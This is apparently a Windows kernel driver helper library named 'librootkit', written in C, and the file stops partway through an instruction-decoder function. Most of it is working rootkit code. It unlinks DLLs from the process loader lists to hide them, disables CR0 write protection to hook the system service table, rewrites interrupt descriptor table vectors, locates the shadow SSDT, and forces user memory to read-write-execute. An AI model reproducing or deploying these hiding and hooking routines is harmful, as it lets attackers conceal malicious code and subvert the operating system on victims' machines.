#include <ntddk.h>
#include <WinDef.h>
#include <ntimage.h>
#include <ntstrsafe.h>
#include <stdio.h>
#include <stdarg.h>
#include "sysdefs.h"
#include "librootkit.h"

SystemAPIS sa;

wchar_t *mapped_string[] = {
    L"Allc",
    L"Exec",
    L"Insn",
    L"Umap",
    L"NULL",
    NULL
};

int region_contains(MappedRegion *region, ULONG addr)
{
	return (region->base <= addr && addr < region->base + region->extent);
}

MappedRegion *find_region(MappedRegion *tosrch, ULONG len, ULONG addr)
{
	ULONG i;
	if(!addr) return 0;

	for(i = 0; i < len; i++) {
		if(region_contains(&tosrch[i], addr))
			return &tosrch[i];
	}
	return 0;
}

MappedRegion *find_region_with_key(MappedRegion *tosrch, ULONG len, ULONG addr,
		DWORD key)
{
	ULONG i;
	if(!addr) return 0;

	for(i = 0; i < len && tosrch[i].mapped; i++) {
		if(region_contains(&tosrch[i], addr) && key == tosrch[i].key)
			return &tosrch[i];
	}
	return 0;
}

MappedRegion *find_hashkey_region(MappedRegion **table, ULONG mod, ULONG len, 
		ULONG addr, DWORD key)
{
	return find_region_with_key(table[key%mod], len, addr, key);
}


void
remove_region_with_key(MappedRegion *table, ULONG len, ULONG addr,
		DWORD key)
{
	MappedRegion *delme = find_region_with_key(table, len, addr, key);

	if(!delme) return;

	memmove(delme, &delme[1], 
			(len-1)*sizeof(MappedRegion) - (delme-table)*sizeof(MappedRegion));
}

void 
remove_hashkey_region(MappedRegion **table, ULONG mod, ULONG len,
		ULONG addr, DWORD key)
{
	remove_region_with_key(table[key%mod], len, addr, key);
}

ULONG GetProcessIDForHandle(HANDLE ProcessHandle) {
	PROCESS_BASIC_INFORMATION PBI;
	NTSTATUS intstatus = ZwQueryInformationProcess(ProcessHandle,
			ProcessBasicInformation,&PBI,sizeof(PBI),NULL);
	if(NT_SUCCESS(intstatus)) {
		return PBI.UniqueProcessId;
	} else {
		return 0;
	}
}

MPEB *GetPebForHandle(HANDLE ProcessHandle) {
	PROCESS_BASIC_INFORMATION PBI;
	NTSTATUS intstatus = ZwQueryInformationProcess(ProcessHandle,
			ProcessBasicInformation,&PBI,sizeof(PBI),NULL);
	if(NT_SUCCESS(intstatus) 
			&& ProbeForWriteStatus(PBI.PebBaseAddress, 1, 1) == 0) 
		return (MPEB *)PBI.PebBaseAddress;
	else
		return NULL;
}

PVOID GetTebForHandle(HANDLE ThreadHandle) {
	THREAD_BASIC_INFORMATION TBI;
	NTSTATUS intstatus = ZwQueryInformationThread(ThreadHandle,
			ThreadBasicInformation,&TBI,sizeof(TBI),NULL);
	if(NT_SUCCESS(intstatus) 
			&& ProbeForWriteStatus(TBI.TebBaseAddress, 1, 1) == 0) 
		return TBI.TebBaseAddress;
	else
		return NULL;
}

// Do not dereference this ptr. You must use ReadProcessMemory
PVOID GetPebForHandleExternal(HANDLE ProcessHandle) {
	PROCESS_BASIC_INFORMATION PBI;
	NTSTATUS intstatus = ZwQueryInformationProcess(ProcessHandle,
			ProcessBasicInformation,&PBI,sizeof(PBI),NULL);
	if(NT_SUCCESS(intstatus))
		return (PVOID)PBI.PebBaseAddress;
	else
		return NULL;
}


// ReactOS
BOOLEAN RemoveEntry(PLIST_ENTRY e) {
	PLIST_ENTRY OldF;
	PLIST_ENTRY OldB;

	OldF = e->Flink;
	OldB = e->Blink;
	OldF->Blink = OldB;
	OldB->Flink = OldF;

	// Hrmm.. Can't decide if this is a good idea or not
	//e->Flink = e;
	//e->Blink = e;

	return (OldF == OldB);
}


PLDR_DATA_TABLE_ENTRY RemoveHandleFromModuleList(PLIST_ENTRY Head, 
		HANDLE dll_handle)
{
	PLIST_ENTRY Entry = Head->Flink;
	PLDR_DATA_TABLE_ENTRY ret = NULL; 
	int cnt = 0;

	ULONG offset = OFFSET_OF(LDR_DATA_TABLE_ENTRY, InLoadOrderModuleList);

	while (Entry != Head) {
		PLDR_DATA_TABLE_ENTRY Module = 
			(PLDR_DATA_TABLE_ENTRY)(((ULONG)Entry) - offset);

		if(Module->BaseDllName.Length && Module->BaseDllName.MaximumLength &&
				ProbeForReadStatus(Module->BaseDllName.Buffer, 1, 1) == 0 &&
				Module->LoadCount &&
				Module->InInitializationOrderModuleList.Flink &&
				Module->InInitializationOrderModuleList.Blink &&
				Module->DllBase == dll_handle) {
	
			ret = Module;	
			LR_DEBUG(("DBG: Found match! %x\r\n", Module->DllBase));
#if 0
			RemovedModule[rcurr].base = (ULONG)Module->DllBase;
			RemovedModule[rcurr].extent = Module->SizeOfImage;
			RemovedModule[rcurr].name = dll->Buffer;
			rcurr++;
			if(rcurr >= sizeof(RemovedModule)/sizeof(RemovedModule[0])) {
				MYDEBUG(("Module overflow\n"));
				rcurr = 0;
			}
#endif
	
			RemoveEntry(&Module->InLoadOrderModuleList);
			RemoveEntry(&Module->InInitializationOrderModuleList);
			RemoveEntry(&Module->InMemoryOrderModuleList);
			cnt++;
			break; // Eh, fuck it.
		} 
		Entry = Entry->Flink;
	}
	return ret;
}

PLDR_DATA_TABLE_ENTRY RemoveNameFromModuleList(PLIST_ENTRY Head, 
		const wchar_t *dll_name)
{
	PLIST_ENTRY Entry = Head->Flink;
	PLDR_DATA_TABLE_ENTRY ret = NULL;
	UNICODE_STRING dll;
	int cnt = 0;
	ULONG offset = OFFSET_OF(LDR_DATA_TABLE_ENTRY, InLoadOrderModuleList);

	RtlInitUnicodeString(&dll, dll_name);

	while (Entry != Head) {
		PLDR_DATA_TABLE_ENTRY Module = NULL;
		Module = (PLDR_DATA_TABLE_ENTRY)(((ULONG)Entry) - offset);

		if(Module->BaseDllName.Length && Module->BaseDllName.MaximumLength &&
				ProbeForReadStatus(Module->BaseDllName.Buffer, 1, 1) == 0 &&
				Module->LoadCount &&
				Module->InInitializationOrderModuleList.Flink &&
				Module->InInitializationOrderModuleList.Blink &&
				RtlCompareUnicodeString(&Module->BaseDllName, &dll, TRUE)==0) {
		
			LR_DEBUG(("DBG: Found match! %ws\r\n", Module->BaseDllName.Buffer));
			ret = Module;
#if 0
			RemovedModule[rcurr].base = (ULONG)Module->DllBase;
			RemovedModule[rcurr].extent = Module->SizeOfImage;
			RemovedModule[rcurr].name = dll->Buffer;
			rcurr++;
			if(rcurr >= sizeof(RemovedModule)/sizeof(RemovedModule[0])) {
				MYDEBUG(("Module overflow\n"));
				rcurr = 0;
			}
#endif
			RemoveEntry(&Module->InLoadOrderModuleList);
			RemoveEntry(&Module->InInitializationOrderModuleList);
			RemoveEntry(&Module->InMemoryOrderModuleList);
			cnt++;
			break; // eh, fuck it..
		} 
		Entry = Entry->Flink;
	}
			
	return ret;
}

// XXX: Does NOT work on SMP systems!
ULONG BIGLOCK;
void BigKernelLock(void)
{
#if 1
	__asm {
		CLI 
		MOV	EAX, CR0
		AND EAX, NOT 10000H
		MOV	CR0, EAX
	}
#else
	__asm {
		// XXX: Store flags before/after CLI/STI
		PUSHF
		POP EAX
		MOV	[BIGLOCK], EAX
		XOR EAX,EAX // This is broken. Need to mask VIF or IF. Not sure which
		PUSH EAX
		POPF
		MOV	EAX, CR0
		AND EAX, NOT 10000H
		MOV	CR0, EAX
	}
	
#endif
}

void BigKernelUnLock(void)
{
#if 1
	__asm {
		MOV	EAX, CR0
		OR	EAX, 10000H
		MOV	CR0, EAX
		STI
	}
#else
	__asm {
		MOV	EAX, CR0
		OR	EAX, 10000H
		MOV	CR0, EAX
		MOV EAX, [BIGLOCK]
		PUSH EAX
		POPF
	}
#endif

}

PVOID BorrowBytesFromTeb(PVOID storage, ULONG len)
{
	ULONG teb = (ULONG)GetCurrentTeb();

	if(!teb || ProbeForWriteStatus((PVOID)teb, 1, 1) != 0) {
		LR_WARN(("WRN: NO TEB! Falling back on PEB\n"));
		return BorrowBytesFromPeb(storage, len);
	}

	if(len > 256) {
		LR_WARN(("WRN: Teb Length > 256 requested! Using PEB and praying to Goddess\n"));
		return BorrowBytesFromPeb(storage, len);
	}

	teb = teb + ((TEB_UNICODE_STORAGE_OFFSET+256) - len);

	// no alarms and no surprises please
	memcpy(storage, (PVOID)teb, len); 

	return (PVOID)teb;
}

void ReturnBytesToTeb(PVOID borrowed, PVOID storage, ULONG len)
{
	memcpy(borrowed, storage, len);
}


// XXX: Not userland thread-safe!!! Use the Teb version instead!
PVOID BorrowBytesFromPeb(PVOID storage, ULONG len)
{
	ULONG peb = (ULONG)GetCurrentPeb();
	
	if (len > 0x666) {
		return 0;
	}

	peb = peb + (0x1000 - len);
	
	// no alarms and no surprises please
	memcpy(storage, (PVOID)peb, len); 
	
	return (PVOID)peb;
}

void ReturnBytesToPeb(PVOID borrowed, PVOID storage, ULONG len)
{
	memcpy(borrowed, storage, len);
}

MPEB *GetCurrentPeb() {
	// Could also use PsGetCurrentProccess and use the
	// resulting EPROCESS struct... But then there may
	// be stupid cases where that address is not valid either
	return GetPebForHandle((HANDLE)-1);

}

PVOID GetCurrentTeb() {
	return GetTebForHandle((HANDLE)NtCurrentThread());
}

BOOL HandleIsCurrentProcess(HANDLE ProcessHandle) {
	PROCESS_BASIC_INFORMATION PBI1, PBI2;
	NTSTATUS intstatus1 = ZwQueryInformationProcess(ProcessHandle,
			ProcessBasicInformation,&PBI1,sizeof(PBI1),NULL);
	NTSTATUS intstatus2 = ZwQueryInformationProcess((HANDLE)-1,
			ProcessBasicInformation,&PBI2,sizeof(PBI2),NULL);
	if(NT_SUCCESS(intstatus1) && NT_SUCCESS(intstatus2) &&
			PBI1.UniqueProcessId == PBI2.UniqueProcessId) 
		return TRUE;
	else
		return FALSE;
}

HANDLE logfile = 0;
NTSTATUS InitDebug()
{
	NTSTATUS stat;
	HANDLE dir1;
	IO_STATUS_BLOCK ios;
	OBJECT_ATTRIBUTES oattr;
	wchar_t fname[256];
	UNICODE_STRING u_fname;
	TIME_FIELDS tf;
	LARGE_INTEGER time;
	LARGE_INTEGER offset;

        if(logfile) {
            return 0;
        }

	logfile = (HANDLE)-1;	
	KeQuerySystemTime(&time);
	RtlTimeToTimeFields(&time, &tf);
	
	RtlStringCbPrintfW(fname, sizeof(fname), L"\\??\\%ws\\%d-%.2d-%.2d", 
				LOG_DIR, tf.Year, tf.Month, tf.Day);
	RtlInitUnicodeString(&u_fname, fname);
	
	InitializeObjectAttributes(&oattr, &u_fname, OBJ_KERNEL_HANDLE, NULL,
			NULL);

	stat = ZwCreateFile(&dir1, FILE_WRITE_ATTRIBUTES, &oattr,  &ios, NULL, 
			FILE_ATTRIBUTE_NORMAL,
			FILE_SHARE_READ|FILE_SHARE_WRITE, FILE_OPEN_IF,
			FILE_DIRECTORY_FILE, 
			NULL, 0);
	
	if(!NT_SUCCESS(stat)) {
		DbgPrint("Directory %ws creation failed: %x\n", fname, stat);
		return stat;
	}

	RtlStringCbPrintfW(fname, sizeof(fname), L"%.2d%.2d.log", tf.Hour, 
			tf.Minute);
	RtlInitUnicodeString(&u_fname, fname);
	DbgPrint("Creating file %ws\n", fname);
	
	InitializeObjectAttributes(&oattr, &u_fname, OBJ_KERNEL_HANDLE, dir1,
			NULL);

	stat = ZwCreateFile(&logfile, GENERIC_WRITE|SYNCHRONIZE, &oattr,  
			&ios, NULL, 
			FILE_ATTRIBUTE_NORMAL,
			FILE_SHARE_READ, FILE_OPEN_IF,
			FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT,
			NULL, 0);
	
	if(!NT_SUCCESS(stat)) {
		DbgPrint("File %ws creation failed: %x\n", fname, stat);
		logfile = (HANDLE)-1;
	}

	ZwClose(dir1);
	return stat;
}

void LogDebug(char *ptr, ...)
{
	IO_STATUS_BLOCK ios;
	char buf[512];
	NTSTATUS stat;
	va_list args;
	va_start(args, ptr);

	stat = RtlStringCbVPrintfA(buf, sizeof(buf), ptr, args);

	if(!NT_SUCCESS(stat)) {
		buf[1023] = 0;
		DbgPrint("Cannot create string (%x): %s\n", stat, buf);
	}

	if(!logfile) {
		stat = InitDebug();
		if(!NT_SUCCESS(stat)) {
			DbgPrint("Cannot open log file: %x!\n", stat);
			DbgPrint("%s", buf);
		}
	} 
	
	if(logfile == (HANDLE)-1) {
		DbgPrint("%s", buf);
	} else {
		stat = ZwWriteFile(logfile, NULL, NULL, NULL, &ios, (PVOID)buf, 
				strlen(buf), NULL, NULL);
	}
}


// XXX: Does this still work with FU? Probably not..
BOOL IsTargetPID(ULONG pid, wchar_t *tgt) {
	PANSI_STRING str;
	UNICODE_STRING utgt;
	char cstr[128];
	MEPROCESS *proc;
	str = (PANSI_STRING)cstr;
	str->Length = sizeof(cstr)-sizeof(*str);
	str->MaximumLength = sizeof(cstr)-sizeof(*str);
	str->Buffer = (char *)&str[1];
	
	RtlInitUnicodeString(&utgt, tgt);
	RtlUnicodeStringToAnsiString(str, &utgt, FALSE);
	PsLookupProcessByProcessId(pid, &proc);

	if(proc && strstr(proc->ImageFileName, str->Buffer)) {
		return TRUE;	
	} else {
		return FALSE;
	}
	
}

BOOL IsTargetExternal(HANDLE External, wchar_t *tgt) {
	PUNICODE_STRING puni;
	wchar_t ZOMGNTSUX[256];
	NTSTATUS stat;

	// this is FUCKED UP. It won't listen to our Buffer pointer
	// and instead wants the memory to be continuous
	puni = (PUNICODE_STRING)ZOMGNTSUX;
	
   	stat = ZwQueryInformationProcess(External,
			ProcessImageFileName,puni,sizeof(ZOMGNTSUX),NULL);
	
	if(NT_SUCCESS(stat)) {
		if(wcsstr(puni->Buffer, tgt)) {
			return TRUE;
		} else {
			return FALSE;
		}
	} else {
		LR_WARN(("WRN: Can't get processname: %x\r\n", stat));
		return FALSE;
	}

#if 0
	// XXX: Use handle to NtReadProcessMemeory at the PEB.
	PVOID peb_ptr = GetPebForHandleExternal(External);
	MMPEB peb;
	ULONG read = 0;
	NTSTATUS stat 
		= ZwReadVirtualMemory(External, peb_ptr, &peb, sizeof(peb), &read);

	NTSYSAPI NTSTATUS NTAPI ZwReadVirtualMemory(IN HANDLE ProcessHandle, 
		IN PVOID BaseAddress, OUT PVOID Buffer, IN ULONG NumberOfBytesToRead, 
		OUT PULONG NumberOfBytesRead OPTIONAL);

	if(NT_SUCCESS(stat) && read) {
		PROCESS_PARAMETERS  pparam;
		read = 0;
		stat = ZwReadVirtualMemory(External, peb.ProcessParameters, &pparam,
				
				
	} else {
		DbgPrint("Cant read PEB in process %x: %x %x\n", External, stat, read);
	}
#endif
}

BOOL PebMatchesTarget(MPEB *mypeb, wchar_t *tgt) {
	// Sometimes the PEB is not initialized yet and it is filled
	// with junk... Supposedly if the locks are non-null, it is good
	// though.
	if(mypeb && ProbeForReadStatus(mypeb, 1, 1) == 0
			&& mypeb->BeingDebugged <= 1 
			&& mypeb->ReadImageFileExecOptions <= 1
			&& mypeb->LoaderLock
			&& mypeb->Ldr
			&& mypeb->FastPebLock
			&& wcsstr(mypeb->ProcessParameters->ImageName.Buffer, tgt)) {
		return TRUE;
	}
	return FALSE;

}

BOOL IsTargetCurrent(HANDLE ProcessHandle, wchar_t *tgt) {
	MPEB *mypeb;
 
	if(!HandleIsCurrentProcess(ProcessHandle)) {
		return FALSE;
	}

	return PebMatchesTarget(GetPebForHandle(ProcessHandle), tgt);
	
}


int ProcessIsNX(HANDLE ProcessHandle)
{
	ULONG flags;
	NTSTATUS intstatus = ZwQueryInformationProcess(ProcessHandle,
			ProcessExecuteFlags,&flags,sizeof(flags),NULL);

	return NT_SUCCESS(intstatus) && (flags & MEM_EXECUTE_OPTION_DISABLE);
}

int ProcessorSupportsNX()
{
	DWORD retval = 0;
	/* See: http://www.amd.com/us-en/assets/content_type/white_papers_and_tech_docs/25481.pdf */
	__asm {
		mov eax, 0x80000001
		cpuid
		mov retval, edx
	}
	return (retval & (1<<20));
}

NTSTATUS MakeProcessNX(HANDLE ProcessHandle)
{
	// Dude this is the most confusing stupid-ass shit ever..
	// Almost as bad as their idea of page permissions...
	// My personal favorite there is that it's not possible to make something
	// write-only... Or write-execute.
	DWORD flags = MEM_EXECUTE_OPTION_DISABLE|MEM_EXECUTE_OPTION_PERMANENT; // 0x1|0x8
	NTSTATUS stat = ZwSetInformationProcess(ProcessHandle,
			ProcessExecuteFlags, &flags, sizeof(flags));

	return stat; 
}

// Stolen from ReactOS before they went nuts and decided to throw their
// code in the trash for no reason.
// XXX: Though this PRNG sux. Find a better one.
ULONG NTAPI
RtlUniform (PULONG Seed)
{
  ULONG Result;

  /*
   * Instead of the algorithm stated above, we use the algorithm
   * below, which is totally equivalent (see the tests), but does
   * not use a division and therefore is faster.
   */
  Result = *Seed * 0xffffffed + 0x7fffffc3;

  if (Result == 0xffffffff || Result == 0x7ffffffe)
    {
      Result = (Result + 2) & MAXLONG;
    }
  else if (Result == 0x7fffffff)
    {
      Result = 0;
    }
  else if ((Result & 0x80000000) == 0)
    {
      Result = Result + (~Result & 1);
    }
  else
    {
      Result = (Result + (Result & 1)) & MAXLONG;
    }

  *Seed = Result;

  return Result;
}


PServiceDescriptorTableEntry_t GetShadowTable()
{
	int i;
	unsigned char *p;
	unsigned int dwordatbyte;

	p=(unsigned char *)KeAddSystemServiceTable;


	for (i=0; i<4096; i++, p++) {
		__try {
			dwordatbyte=*(unsigned int *)p;
		}

		__except (EXCEPTION_EXECUTE_HANDLER) {
			return 0;
		}

		if (MmIsAddressValid((PVOID)dwordatbyte)) {
			if (memcmp((PVOID)dwordatbyte, &KeServiceDescriptorTable, 16)==0) {

				if ((PVOID)dwordatbyte==&KeServiceDescriptorTable) {
					continue;
				}

				LR_DEBUG(("DBG: Shadow @%x\r\n", dwordatbyte));
				return (PServiceDescriptorTableEntry_t)dwordatbyte;
			}
		}
	}

	return 0;
}

NTSTATUS MyProbeAndLockPages(HANDLE proc, DWORD start, DWORD end)
{
	QUOTA_LIMITS ql;
	ULONG *pebptr;
	ULONG tmp[3];
	NTSTATUS stat;
	ULONG size = 0;
	DWORD cur = start;

	LR_DEBUG(("DBG: About to probe and lock at IRQL %d\n",
				KeGetCurrentIrql()));
	// Lock down memory for user.
	// Hrmm.. Do we need to acquire priv 0E first or something??
	stat = ZwQueryInformationProcess(proc, 
			ProcessQuotaLimits,  &ql, sizeof(ql), &size);

	if(!NT_SUCCESS(stat)) {
		LR_NOTE(("NOT: GetWorkingSet: %x\n", stat));
	} else {
		LR_DEBUG(("DBG: ql: %x %x %x\n", ql.NonPagedPoolLimit,
					ql.MinimumWorkingSetSize, ql.MaximumWorkingSetSize));

		ql.NonPagedPoolLimit += (end - start);
		ql.MinimumWorkingSetSize += (end - start);
		//ql.MaximumWorkingSetSize += (end - start);

		stat = ZwSetInformationProcess(proc, 
				ProcessQuotaLimits, &ql, sizeof(ql));

		if(!NT_SUCCESS(stat)) {
			LR_NOTE(("NOT: SetWorkingSet: %x\n", stat));
		}
	}

	// Pages now probed.. Lock them.
	pebptr = BorrowBytesFromTeb(tmp, sizeof(tmp)); // Need userland addr

	pebptr[0] = cur;
	pebptr[1] = end - cur;

	// Give ourselves permission to read, write, and execute
	
	stat = sa.ZwProtectVirtualMemory(proc, (PVOID*)&pebptr[0], &pebptr[1], 
			PAGE_EXECUTE_READWRITE, &pebptr[2]);
	if(!NT_SUCCESS(stat) || pebptr[0] != cur || pebptr[1] != end-cur) { 
		LR_WARN(("WRN: Failed to give full perms to %x-%x: %x, %x+%x",
					cur, end, stat, pebptr[0], pebptr[1]));
		goto out;
	}

	for(; cur < end; cur += PAGE_SIZE) {

		pebptr[0] = cur;
		pebptr[1] = PAGE_SIZE;
		
		// Need to both read and write for probe to get COW pages
		stat = sa.ZwReadVirtualMemory(proc, (PVOID)pebptr[0], &pebptr[2], 1, 0);
		if(!NT_SUCCESS(stat)) {
			LR_WARN(("WRN: Failed to read page %x: %x\n", cur, stat));
			goto out;
		}

		stat = sa.ZwWriteVirtualMemory(proc, (PVOID)pebptr[0], 
				(PVOID)&pebptr[2], 1, &pebptr[1]);

		if(!NT_SUCCESS(stat)) {
			LR_WARN(("WRN: Failed to write page %x: %x, %x\n", cur, stat, pebptr[1]));
			goto out;
		}
		
	}
	pebptr[0] = start;
	pebptr[1] = end - start;

	stat = sa.NtLockVirtualMemory(proc, (PVOID*)&pebptr[0], &pebptr[1], 1);
	if(!NT_SUCCESS(stat) || pebptr[1] != end-start) {
		LR_WARN(("WRN: Failed to lock %x-%x: %x, %x\n", start, end, 
					stat, pebptr[1]));
		goto out;
	}


out:
	ReturnBytesToTeb(pebptr, tmp, sizeof(tmp));
	return stat;
}

// TODO: Might be nice to reimplement this to work with kernel addrs.. Not hard
NTSTATUS ProbeForWriteStatus(PVOID towrite, SIZE_T len, ULONG align)
{
	__try {
		ProbeForWrite(towrite, len, align);
	} __except(1) {
		return GetExceptionCode();
	}
	return 0;
}

NTSTATUS ProbeForReadStatus(PVOID toread, SIZE_T len, ULONG align)
{
	__try {
		volatile CHAR *Current;
		volatile CHAR tmp;
		CHAR *Last;

		ProbeForRead(toread, len, align);

		Current = (volatile CHAR*)toread;
		Last = (PCHAR)(PAGE_ROUND_DOWN(Current+len-1));

		if((DWORD)Last < (DWORD)PAGE_ROUND_DOWN(Current)) {
			LR_NOTE(("NOT: negative length: %d\n", len));
			return STATUS_INVALID_PARAMETER;
		}

		do {
			tmp = *Current;
			Current = (volatile CHAR*)(PAGE_ROUND_DOWN(Current) + PAGE_SIZE);
		} while (Current <= Last);                                              
	} __except(1) {
		return GetExceptionCode();
	}
	return 0;
}


VOID
GetINTVector( 
        IN    PIDT        pIdt, 
        IN    UCHAR        iVector, 
        OUT    PINT_VECTOR    pVector )
{
    __try
    {
        DWORD dwBase = pIdt->dwBase + iVector * sizeof(INT_VECTOR);
        memcpy( pVector, (const void *)dwBase, sizeof(INT_VECTOR) );
    }
    __except( 1 )
    {
        LR_WARN(( "LoadINTVector: Exception\n" ));
    }

    LR_DEBUG(( "LoadINTVector: Vector 0x%.2X successfully dumped\n",
       iVector ));
}

VOID
SetINTVector( 
        IN    PIDT        pIdt, 
        IN    UCHAR        iVector, 
        IN    PINT_VECTOR    pVector )
{
    __try
    {
        DWORD dwBase = pIdt->dwBase + iVector * sizeof(INT_VECTOR);
        __asm{ PUSHFD };
        __asm{ CLI };        // IMPORTANT: clear interrupt flag!!!
        memcpy( (void *)dwBase, pVector, sizeof(INT_VECTOR) );
        __asm{ STI }; 
        __asm{ POPFD };
    }
    __except( 1 )
    {
        __asm{ STI }; 
        __asm{ POPFD };
 		
		LR_WARN(( "SaveINTVector: Exception\n" ));
    }

    LR_DEBUG(( "SaveINTVector: Vector 0x%.2X successfully set\n", iVector ));
}


VOID
LoadIDT( 
		OUT    PIDT        pIdt )
{
	__asm
	{
		MOV EAX, [pIdt]  // load offset into EAX
			SIDT [EAX]
	}
}

// Like driving drunk on the highway, all it takes is practice
// Kudos to gareth: http://www.rootkit.com/newsread_print.php?newsid=248
HANDLE KLoadLibrary(const wchar_t *full_dll_path)
{
    HANDLE hSection, hFile;
    UNICODE_STRING dllName;
    PVOID BaseAddress = NULL;
    SIZE_T size = 0;
    NTSTATUS stat;
    OBJECT_ATTRIBUTES oa = {sizeof(oa), 0, &dllName, OBJ_CASE_INSENSITIVE};
    IO_STATUS_BLOCK iosb;

   	LR_DEBUG(("DBG: ABout to load %ws at IRQL %d\n", full_dll_path,
			KeGetCurrentIrql()));
   	RtlInitUnicodeString(&dllName, full_dll_path);


    //_asm int 3;
    stat = ZwOpenFile(&hFile, FILE_EXECUTE | SYNCHRONIZE, &oa, &iosb, 
            FILE_SHARE_READ, FILE_SYNCHRONOUS_IO_NONALERT);

    if(!NT_SUCCESS(stat)) {
        LR_WARN(("WRN: Can't open %ws: %x\n", full_dll_path, stat)); 
        return 0;
    }

    oa.ObjectName = 0;

    stat = ZwCreateSection(&hSection, SECTION_ALL_ACCESS, &oa, 0,PAGE_EXECUTE, 
            SEC_IMAGE, hFile);

    if(!NT_SUCCESS(stat)) {
        LR_WARN(("WRN: Can't create section %ws: %x\n", full_dll_path, stat)); 
        return 0;
    }
 
    stat = ZwMapViewOfSection(hSection, NtCurrentProcess(), &BaseAddress, 0, 
            1000, 0, &size, (SECTION_INHERIT)1, MEM_TOP_DOWN, PAGE_READWRITE);

    if(!NT_SUCCESS(stat)) {
        LR_WARN(("WRN: Can't map section %ws: %x\n", full_dll_path, stat)); 
        return 0;
    }
    
    ZwClose(hSection);
    ZwClose(hFile);

	LR_DEBUG(("DBG: Successfully loaded %ws\n", full_dll_path));
    return BaseAddress;
}

DWORD GetProc(HANDLE hMod, char *lpFunctionName)
{
    IMAGE_DOS_HEADER* dosheader;
    IMAGE_OPTIONAL_HEADER* opthdr;
    IMAGE_EXPORT_DIRECTORY* pExportTable;
    DWORD* arrayOfFunctionAddresses;
    DWORD* arrayOfFunctionNames;
    WORD* arrayOfFunctionOrdinals;
    DWORD functionOrdinal;
    DWORD Base, x, functionAddress;
    char* functionName;
    STRING ntFunctionName, ntFunctionNameSearch;
    PVOID BaseAddress = NULL;
    SIZE_T size=0;
   
    dosheader = (IMAGE_DOS_HEADER *)hMod;
    
    opthdr =(IMAGE_OPTIONAL_HEADER *) ((BYTE*)hMod+dosheader->e_lfanew+24);

	if(strcmp(lpFunctionName, "__ImageBaseAddress") == 0) {
		LR_DEBUG(("DBG: Fetching Base Address for module\n"));
		return opthdr->ImageBase;
	}

    pExportTable =(IMAGE_EXPORT_DIRECTORY*)((BYTE*) hMod + opthdr->DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT]. VirtualAddress);

    // now we can get the exported functions, but note we convert from RVA to address
    arrayOfFunctionAddresses = (DWORD*)( (BYTE*)hMod + pExportTable->AddressOfFunctions);

    arrayOfFunctionNames = (DWORD*)( (BYTE*)hMod + pExportTable->AddressOfNames);

    arrayOfFunctionOrdinals = (WORD*)( (BYTE*)hMod + pExportTable->AddressOfNameOrdinals);

    Base = pExportTable->Base;

    RtlInitString(&ntFunctionNameSearch, lpFunctionName);

    for(x = 0; x < pExportTable->NumberOfFunctions; x++)
    {
        functionName = (char*)( (BYTE*)hMod + arrayOfFunctionNames[x]);

        RtlInitString(&ntFunctionName, functionName);

        functionOrdinal = arrayOfFunctionOrdinals[x] + Base - 1; // always need to add base, -1 as array counts from 0
        // this is the funny bit.  you would expect the function pointer to simply be arrayOfFunctionAddresses[x]...
        // oh no... thats too simple.  it is actually arrayOfFunctionAddresses[functionOrdinal]!!
        functionAddress = (DWORD)( (BYTE*)hMod + arrayOfFunctionAddresses[functionOrdinal]);
        if (RtlCompareString(&ntFunctionName, &ntFunctionNameSearch, TRUE) == 0)
        {
            return functionAddress;
        }
    }

    return 0;

}

WORD GetSyscallIndex(HANDLE dll, char *syscall)
{
    DWORD functionAddress = (DWORD)GetProc(dll, syscall);

	if (!functionAddress) {
		LR_NOTE(("NOT: Failed to lookup function %s in %x\n", syscall, dll));
		return 0;
	}

    return *((WORD*)(functionAddress+1));
}

// Obviously this isn't 100% because of relocations, but for ntdll/kernel32
// its good enough
DWORD KGetProcAddress(HANDLE dll, char *fcn)
{
	DWORD base = (DWORD)GetProc(dll, "__ImageBaseAddress");
	DWORD fcnMapped = GetProc(dll, fcn);

	if(fcnMapped) {
		return base + (fcnMapped - (DWORD)dll);
	} else {
		return 0;
	}

}

void KFreeLibrary(HANDLE hMod)
{
    ZwUnmapViewOfSection(NtCurrentProcess(), hMod);
}

DWORD BadSyscall()
{
	LR_WARN(("WRN: Syscall didn't resolve, yet you called it anyway!"));
	return 0;
}


DWORD GetSyscall(HANDLE dll, char *syscall)
{
	WORD idx = GetSyscallIndex(dll, syscall);

	if (!idx) {
		return (DWORD)BadSyscall;
	}

	return (DWORD)SYSTEM_SERVICE_IDX(idx);
}

// Yes, Alex, a hooking API. Just 4 U! 
// You know you love it. XOXOXO ;)
DWORD HookSyscall(HANDLE dll, char *syscall, DWORD NewFcn)
{
	DWORD *table_entry;
	DWORD old_entry;
	WORD idx = GetSyscallIndex(dll, syscall);

	if (!idx) {
		return 0;
	}

	if(!NewFcn) {
		LR_WARN(("WRN: Cowardly refusing to hook with NULL NewFcn\n"));
		return 0;
	}

	table_entry = (DWORD *) &SYSTEM_SERVICE_IDX(idx);
	old_entry = *table_entry;
	
	__asm {
		CLI 
		MOV	EAX, CR0
		AND EAX, NOT 10000H
		MOV	CR0, EAX
	}

	*table_entry = NewFcn;

	__asm {
		MOV	EAX, CR0
		OR	EAX, 10000H
		MOV	CR0, EAX
		STI
	}
	return old_entry;
}

// From: http://www.devmaster.net/forums/showthread.php?t=2311
// Mega MEGA kudos to Nicolas Capens. I owe you a six-pack dude!!
DWORD FindFirstInsnBoundary(unsigned char *funcStart, int reqSpace)
{
	unsigned char *func = funcStart;
    int count = 0; 

    while(func - funcStart < reqSpace) 
    { 
        // Skip prefixes F0h, F2h, F3h, 66h, 67h, D8h-DFh, 
		// 2Eh, 36h, 3Eh, 26h, 64h and 65h
        int operandSize = 4; 
        int FPU = 0; 
        int twoByte = 0; 
        unsigned char modRM = 0xFF; 
        unsigned char opcode;
        while(*func == 0xF0 || 
              *func == 0xF2 || 
              *func == 0xF3 || 
             (*func & 0xFC) == 0x64 || 
             (*func & 0xF8) == 0xD8 ||
             (*func & 0x7E) == 0x62)
        { 
            if(*func == 0x66) 
            { 
                operandSize = 2; 
            }
            else if((*func & 0xF8) == 0xD8) 
            {
                FPU = *func++;
                break;
            }

            func++;
        }

        // Skip two-byte opcode byte 
        if(*func == 0x0F) 
        { 
            twoByte = 1; 
            func++; 
        } 

        // Skip opcode byte 
        opcode = *func++; 

        // Skip mod R/M byte 
        if(FPU) 
        { 
            if((opcode & 0xC0) != 0xC0) 
            { 
                modRM = opcode; 
            } 
        } 
        else if(!twoByte) 
        { 
            if((opcode & 0xC4) == 0x00 || 
